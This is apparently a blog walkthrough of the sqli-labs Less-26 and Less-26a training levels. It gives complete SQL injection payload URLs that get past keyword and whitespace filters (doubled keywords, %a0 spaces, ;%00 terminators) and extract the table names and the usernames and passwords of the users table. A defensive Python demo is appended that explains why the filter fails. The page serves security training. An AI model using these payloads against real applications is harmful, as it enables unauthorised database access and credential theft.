sqli-labs Less-26 and Less-26a

Less-26

id=1 returns normally

id=1' returns an error

id=1'--+ still returns an error, and the page output does not show --+: the comment marker is being stripped.

http://192.168.50.100/sqli/Less-26/?id=1';%00 displays normally, which confirms the injection point.

Looking at the source, the code contains replacement statements that filter out and, or, the comment markers --+ and #, spaces, and slashes.

http://192.168.50.100/sqli/Less-26/?id=1'OoRr'1'='1

The filter removes each keyword in a single pass, so OoRr loses its inner oR and what reaches the query is Or.

Substitutions:

or can be replaced by ||

and can be replaced by && (%26%26 when URL-encoded)

comment markers: terminate the statement with ;%00 instead

spaces: replace with %a0

Method 1

Query the database name: http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(database())),1)||'1'='1

Enumerate tables (0x7365637572697479 is "security" in hex):

http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema=0x7365637572697479))),1)||'1'='1

Enumerate columns (0x7573657273 is "users" in hex):

http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name=0x7573657273))),1)||'1'='1

Dump the field values from the users table; the value returned through the error message is short and incomplete.

http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(select (group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users))),1)||'1'='1

http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(select (group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) where (id=2))),1)||'1'='1

By changing the value of id you can walk through all of the rows.

In the method above, error-based injection was used because spaces cannot be used. What if we substitute characters instead? Can the space be replaced with an encoded character?

Less-26, method 2: character substitution

http://192.168.50.100/sqli/Less-26/?id=0'%a0union%a0select%a01,2,(select%a0group_concat(concat_ws(0x7e,username,passwoorrd))%a0from(%a0security.users));%00

%a0 is accepted by MySQL as whitespace, but the filter's whitespace pattern does not match it, so it survives the replacement: an encoding mismatch.

Less-26a

id=1 returns normally

id=1' returns an error

http://192.168.50.100/sqli/Less-26a/?id=1' || '1'='1

 

You can see that it suppresses the error output, so updatexml error-based injection can no longer be used.

%a0 serves as the space; without a space the query errors.

Alternative bypass:

http://192.168.50.100/sqli/Less-26a/?id=0')%a0union%a0select%a01,2,(select%a0group_concat(concat_ws(0x7e,username,passwoorrd))%a0from(%a0security.users));%00
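As an added example (not the lab's code and not from the original post), the Python below models the single-pass keyword filter described for Less-26 and reused in Less-26a, and shows from the defender's side why keyword removal is not a fix: the page's OoRr probe and the %a0 character both pass through it, while a parameterised query makes the same input harmless. The regex patterns in blacklist() and the rows in the users table are assumptions constructed for this demo, and SQLite stands in for MySQL.

```python
import re
import sqlite3

# Added example, not the lab's own code. blacklist() is a Python reconstruction
# of the single-pass keyword filter the page describes (it strips or, and, the
# comment markers, whitespace and slashes); the exact patterns are an assumption.
# The users table below is constructed sample data.


def blacklist(user_input: str) -> str:
    """Single-pass removal filter: every rule runs exactly once, in this order."""
    s = user_input
    s = re.sub(r"or", "", s, flags=re.IGNORECASE)   # strip "or"
    s = re.sub(r"and", "", s, flags=re.IGNORECASE)  # strip "and"
    s = re.sub(r"[/*]", "", s)                      # strip the pieces of /* */
    s = re.sub(r"-", "", s)                         # strip -- (assumed [--] class)
    s = re.sub(r"#", "", s)                         # strip #
    # re.ASCII limits \s to ASCII whitespace, like PCRE without the /u modifier,
    # so the \xa0 character (%a0 on the page) is not removed. Python's default
    # Unicode \s would strip it, which is not what the lab's filter does.
    s = re.sub(r"\s", "", s, flags=re.ASCII)
    s = re.sub(r"[/\\]", "", s)                     # strip slashes
    return s


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for security.users with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "sample-pw-1"), (2, "bob", "sample-pw-2"), (3, "carol", "sample-pw-3")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Filter, then concatenate: whatever survives the filter is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE id='{blacklist(raw_id)}' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Parameterised query: the input is bound as one value and never parsed as SQL."""
    rows = conn.execute("SELECT username FROM users WHERE id=? ORDER BY id", (raw_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    probe = "1'OoRr'1'='1"                 # the page's keyword-doubling probe
    print(blacklist(probe))               # 1'Or'1'='1  (inner "oR" removed, outer "Or" remains)
    print(vulnerable_lookup(db, probe))   # ['alice', 'bob', 'carol']: condition became id='1' Or '1'='1'
    print(safe_lookup(db, probe))         # []  the literal string matches no id
    print(blacklist("Oregon"))            # egon: benign input is mangled as well
    print("\xa0" in blacklist("0'\xa0union\xa0select"))  # True: %a0 passes the whitespace rule
```

Run it directly to see the filtered strings and both query results. The two points to take away: a removal filter is bypassable whenever its output can still contain a token it was meant to remove (and it quietly corrupts benign values such as Oregon or password), and a bound parameter removes the problem at the root because the input never becomes part of the SQL text. Running the application's database account with least privilege limits what an injection can read from information_schema if one still gets through.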


Origin www.cnblogs.com/xingyuner/p/12239364.html